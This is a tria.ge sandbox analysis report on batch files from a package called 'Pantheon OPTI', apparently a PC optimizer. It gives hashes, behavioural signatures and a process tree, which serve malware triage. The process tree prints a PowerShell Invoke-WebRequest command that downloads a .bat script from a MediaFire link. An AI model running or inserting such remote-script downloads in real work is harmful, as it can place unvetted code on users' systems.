Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
10/03/2024, 04:34
Static task
static1
Behavioral task
behavioral1
Sample
Pantheon OPTI/#STEP 1 ( INSTALL ).bat
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Pantheon OPTI/#STEP 1 ( INSTALL ).bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
Pantheon OPTI/#STEP 2 ( MAIN UI ).bat
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
Pantheon OPTI/#STEP 2 ( MAIN UI ).bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
Pantheon OPTI/ServiceEnabler ( DO IF NEEDED ).bat
Resource
win7-20240221-en
General
-
Target
Pantheon OPTI/#STEP 1 ( INSTALL ).bat
-
Size
219B
-
MD5
e38d3316a4024ac174d42e93978f0ac6
-
SHA1
55bbc14e4f035b00d0ffd93ee8f78ba240912c96
-
SHA256
27f8ceb3f2b70dc9a9bda00cbc67b1b75f601dd856409fc9ee4553a398b99b05
-
SHA512
1bcac4d958f8124f583d3a9529e93cb3f9f29942d6ecb5b49c58e3e0b245c46353f281604ce22f26934e623562895de05f15f5e338b679b4ec78ac0e228f6105
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 948 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 948 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1972 wrote to memory of 948 1972 cmd.exe 29 PID 1972 wrote to memory of 948 1972 cmd.exe 29 PID 1972 wrote to memory of 948 1972 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Pantheon OPTI\#STEP 1 ( INSTALL ).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://www.mediafire.com/file/ir82iqyjw2edhe6/Pantheonopti.bat/file -Outfile Pantheonopti.bat"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:948
-